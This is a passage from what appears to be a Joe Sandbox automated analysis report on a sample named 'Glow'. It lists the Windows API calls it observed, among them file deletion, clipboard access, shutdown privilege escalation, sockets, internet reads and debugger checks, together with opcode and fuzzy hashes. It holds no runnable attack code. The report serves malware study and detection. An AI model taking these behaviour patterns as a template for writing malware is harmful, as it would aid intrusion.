                                                                                                                                                                            • Part of subcall function 003EEAB0: GetFileAttributesW.KERNEL32(?,003ED840), ref: 003EEAB1
                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 003ED9CD
                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 003EDA88
                                                                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 003EDA9B
                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 003EDAB8
                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 003EDAE2
                                                                                                                                                                            • Part of subcall function 003EDB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,003EDAC7,?,?), ref: 003EDB5D
                                                                                                                                                                          • FindClose.KERNEL32(00000000,?,?,?), ref: 003EDAFE
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 003EDB0F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                          • String ID: \*.*
                                                                                                                                                                          • API String ID: 1946585618-1173974218
                                                                                                                                                                          • Opcode ID: 0a86cb0de096e89498c3982ab11737de42785b302cf1f7ab61ab6efeedf37404
                                                                                                                                                                          • Instruction ID: ef508acfd767ad259016a063a03360e455f56c20b7635e51e0cb19cd3b22712f
                                                                                                                                                                          • Opcode Fuzzy Hash: 0a86cb0de096e89498c3982ab11737de42785b302cf1f7ab61ab6efeedf37404
                                                                                                                                                                          • Instruction Fuzzy Hash: C6613E3180529EAFCF06FFA1D9529EDB7B5AF14304F2081A5E4027B192EB315F09CB50
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1737998785-0
                                                                                                                                                                          • Opcode ID: 2e42c38e20498c81d0251b68683d09a8be6a04fd1bb7ea6e404a992be0236b62
                                                                                                                                                                          • Instruction ID: f7acc5e5beeb579b9c0b2a9df715f54b8e5258971bbe7f8fe9b042945cc1b82a
                                                                                                                                                                          • Opcode Fuzzy Hash: 2e42c38e20498c81d0251b68683d09a8be6a04fd1bb7ea6e404a992be0236b62
                                                                                                                                                                          • Instruction Fuzzy Hash: D841BD71A04611AFD311DF24D888B65BBE4EF44358F15C0A9E82A8F662C775EC41CB90
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 003E2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003E205A
                                                                                                                                                                            • Part of subcall function 003E2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003E2087
                                                                                                                                                                            • Part of subcall function 003E2010: GetLastError.KERNEL32 ref: 003E2097
                                                                                                                                                                          • ExitWindowsEx.USER32(?,00000000), ref: 003EF249
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                          • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                          • API String ID: 2234035333-3163812486
                                                                                                                                                                          • Opcode ID: 8e45e057f937d7f46644c776fa4bad955779a509c35fa815a7170f0262b7d499
                                                                                                                                                                          • Instruction ID: 8216534aa2a2f617f8b96ad437002a845bf3ac19fe643012c3ac962432e11b78
                                                                                                                                                                          • Opcode Fuzzy Hash: 8e45e057f937d7f46644c776fa4bad955779a509c35fa815a7170f0262b7d499
                                                                                                                                                                          • Instruction Fuzzy Hash: FB01D6BEA112B06FEB1566B99C8ABFB736C9B08344F154E31FE12E61D1D7A05D009194
                                                                                                                                                                          APIs
                                                                                                                                                                          • DefDlgProcW.USER32(?,?), ref: 0038233E
                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00382421
                                                                                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 00382434
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Color$Proc
                                                                                                                                                                          • String ID: (E
                                                                                                                                                                          • API String ID: 929743424-3218771753
                                                                                                                                                                          • Opcode ID: 847cae03b3ccfb52fea6158d0d41a301d51903d593147c000050cb268d38356c
                                                                                                                                                                          • Instruction ID: 377e4c37221321cc8f51e9e36f425bff651c4bce38febdac71497fdf0ad6c28e
                                                                                                                                                                          • Opcode Fuzzy Hash: 847cae03b3ccfb52fea6158d0d41a301d51903d593147c000050cb268d38356c
                                                                                                                                                                          • Instruction Fuzzy Hash: 488129F4104700BEE22B76398CA8FBF255EEB46304B16419EF102D6996C99DDF42937A
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,003C56C2,?,?,00000000,00000000), ref: 003F3A1E
                                                                                                                                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,003C56C2,?,?,00000000,00000000), ref: 003F3A35
                                                                                                                                                                          • LoadResource.KERNEL32(?,00000000,?,?,003C56C2,?,?,00000000,00000000,?,?,?,?,?,?,003866CE), ref: 003F3A45
                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000,?,?,003C56C2,?,?,00000000,00000000,?,?,?,?,?,?,003866CE), ref: 003F3A56
                                                                                                                                                                          • LockResource.KERNEL32(003C56C2,?,?,003C56C2,?,?,00000000,00000000,?,?,?,?,?,?,003866CE,?), ref: 003F3A65
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                          • String ID: SCRIPT
                                                                                                                                                                          • API String ID: 3051347437-3967369404
                                                                                                                                                                          • Opcode ID: d5ceb219bb59e523181a1667e2c9cfdfe27233626f1ff284eb03dafebef4368f
                                                                                                                                                                          • Instruction ID: a22c7b31a4695c368bc625068b901d9ca698c25ebe84001e3504c1114a66ef08
                                                                                                                                                                          • Opcode Fuzzy Hash: d5ceb219bb59e523181a1667e2c9cfdfe27233626f1ff284eb03dafebef4368f
                                                                                                                                                                          • Instruction Fuzzy Hash: D9118EB0600705BFEB218F66DD48F677BB9EBC5B40F14866CB522D6250DB71DD008631
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 003E1900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003E1916
                                                                                                                                                                            • Part of subcall function 003E1900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003E1922
                                                                                                                                                                            • Part of subcall function 003E1900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003E1931
                                                                                                                                                                            • Part of subcall function 003E1900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003E1938
                                                                                                                                                                            • Part of subcall function 003E1900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003E194E
                                                                                                                                                                          • GetLengthSid.ADVAPI32(?,00000000,003E1C81), ref: 003E20FB
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 003E2107
                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 003E210E
                                                                                                                                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 003E2127
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,003E1C81), ref: 003E213B
                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 003E2142
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3008561057-0
                                                                                                                                                                          • Opcode ID: f56112a02a8fe33e8fa0fc2f9a1fbc5471c94f14a59bf6fab4357d82b8d04295
                                                                                                                                                                          • Instruction ID: 2a30059e43aecb1d5f68c860af5516f5f10af57b96ca4d07dfa82199136a70a2
                                                                                                                                                                          • Opcode Fuzzy Hash: f56112a02a8fe33e8fa0fc2f9a1fbc5471c94f14a59bf6fab4357d82b8d04295
                                                                                                                                                                          • Instruction Fuzzy Hash: B011ACB1900214FFDB119B65CC09FAF7BADEF45355F158128E941971A0C735AA40CB64
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333
                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 003FA5BD
                                                                                                                                                                          • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 003FA6D0
                                                                                                                                                                            • Part of subcall function 003F42B9: GetInputState.USER32 ref: 003F4310
                                                                                                                                                                            • Part of subcall function 003F42B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003F43AB
                                                                                                                                                                          • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 003FA5ED
                                                                                                                                                                          • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 003FA6BA
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                          • API String ID: 1972594611-438819550
                                                                                                                                                                          • Opcode ID: a2b0e8ac97b59c399690ff7994ba47935543fa92e05b8731886c0ed6340245c9
                                                                                                                                                                          • Instruction ID: 48a93141978f598db26cc561449ddafea2ab2aeed48601d3e7b3b65eda44d2e2
                                                                                                                                                                          • Opcode Fuzzy Hash: a2b0e8ac97b59c399690ff7994ba47935543fa92e05b8731886c0ed6340245c9
                                                                                                                                                                          • Instruction Fuzzy Hash: E54177B190060EAFCF16EF64C945AEEBBB8EF05350F144055E919E6291E7309E44CF61
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00403AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00403AD7
                                                                                                                                                                            • Part of subcall function 00403AAB: _wcslen.LIBCMT ref: 00403AF8
                                                                                                                                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 004022BA
                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 004022E1
                                                                                                                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00402338
                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 00402343
                                                                                                                                                                          • closesocket.WSOCK32(00000000), ref: 00402372
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1601658205-0
                                                                                                                                                                          • Opcode ID: 52c85f8f9b09e67f80cd2c4c29996f3ea5bf65adf6e777baeb9bf6690a3dcfca
                                                                                                                                                                          • Instruction ID: 5e33a648404148c395bb8714d57478043b632fad1d5ec8ab437aa03b23e0cf44
                                                                                                                                                                          • Opcode Fuzzy Hash: 52c85f8f9b09e67f80cd2c4c29996f3ea5bf65adf6e777baeb9bf6690a3dcfca
                                                                                                                                                                          • Instruction Fuzzy Hash: 3C51C371A00200AFE711AF24C98AF6A77E5AB44714F54809DF9596F3C3D774AD42CBA1
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 292994002-0
                                                                                                                                                                          • Opcode ID: a9e4f0913fe4e91545be5f6672d4b670b59a69d9d660b8db4d17280ae2a908b3
                                                                                                                                                                          • Instruction ID: 2063fb8ca8fc4e70b0c09c1fb59966125cc5de5a02334861b35e8cd25d1b8e43
                                                                                                                                                                          • Opcode Fuzzy Hash: a9e4f0913fe4e91545be5f6672d4b670b59a69d9d660b8db4d17280ae2a908b3
                                                                                                                                                                          • Instruction Fuzzy Hash: 4F2127357002109FD7119F26C944B9B7BE5EF95314F18806EE859CB391D7B9EC82CB98
                                                                                                                                                                          APIs
                                                                                                                                                                          • InternetReadFile.WININET(?,?,00000400,?), ref: 003FD8CE
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 003FD92F
                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000000), ref: 003FD943
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 234945975-0
                                                                                                                                                                          • Opcode ID: adea2c84eab3147462c9480b25c1e1650f3d61fd620b552e8efee2aec1e78bba
                                                                                                                                                                          • Instruction ID: 570bbb2f14436653bcc19cc68d87196e22eedd091fa5b4f63c5bba2b382f11f9
                                                                                                                                                                          • Opcode Fuzzy Hash: adea2c84eab3147462c9480b25c1e1650f3d61fd620b552e8efee2aec1e78bba
                                                                                                                                                                          • Instruction Fuzzy Hash: B221D3B1900709EFE7229FA5C848BABB7FDEF41314F10842DE65692141D7B4EE04CB54
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrlenW.KERNEL32(?,003C46AC), ref: 003EE482
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 003EE491
                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 003EE4A2
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 003EE4AE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2695905019-0
                                                                                                                                                                          • Opcode ID: 74a61c8b0aa40a0dae17decb73785810d5cc79b9c9d5bd0c3266074fdd10d447
                                                                                                                                                                          • Instruction ID: 9bda655b406ddc5729c2935444bc1820df045c6d9bbb3386f64613f594b224d3
                                                                                                                                                                          • Opcode Fuzzy Hash: 74a61c8b0aa40a0dae17decb73785810d5cc79b9c9d5bd0c3266074fdd10d447
                                                                                                                                                                          • Instruction Fuzzy Hash: F0F0E57081093067D211773DAC0D8EB77ADAE02335B508751F836C20F0D7789D958A99
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LocalTime
                                                                                                                                                                          • String ID: %.3d$X64
                                                                                                                                                                          • API String ID: 481472006-1077770165
                                                                                                                                                                          • Opcode ID: 39c296f4400e2a3f0b0b619259071e180273cf6404e8c9fcddee88edb5e9bd11
                                                                                                                                                                          • Instruction ID: ed392bba82dbac319d7a2f24287c0526f3721e636cfadb635049dbcfec6c32f9
                                                                                                                                                                          • Opcode Fuzzy Hash: 39c296f4400e2a3f0b0b619259071e180273cf6404e8c9fcddee88edb5e9bd11
                                                                                                                                                                          • Instruction Fuzzy Hash: F7D012B3C08118DACB82EAA0AC88DB9777CAB18700F2084A7F906D5540E634D9489725
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 003B2A8A
                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 003B2A94
                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 003B2AA1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                          • Opcode ID: fe4b54c5f58b9cc50c37c9b20f646d3010ae95f0f3006ad61c36b700999e8ed8
                                                                                                                                                                          • Instruction ID: ca44e95e5b446a18b9200491e57f0083c88a869c943c2da67832d530b8c72e09
                                                                                                                                                                          • Opcode Fuzzy Hash: fe4b54c5f58b9cc50c37c9b20f646d3010ae95f0f3006ad61c36b700999e8ed8
                                                                                                                                                                          • Instruction Fuzzy Hash: E131D87590121C9BCB21DF68D9887DDBBB4EF08310F5082EAE81CA7260E7749F858F45
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 003A014B: __CxxThrowException@8.LIBVCRUNTIME ref: 003A09D8
                                                                                                                                                                            • Part of subcall function 003A014B: __CxxThrowException@8.LIBVCRUNTIME ref: 003A09F5
                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003E205A
                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003E2087
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 003E2097
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
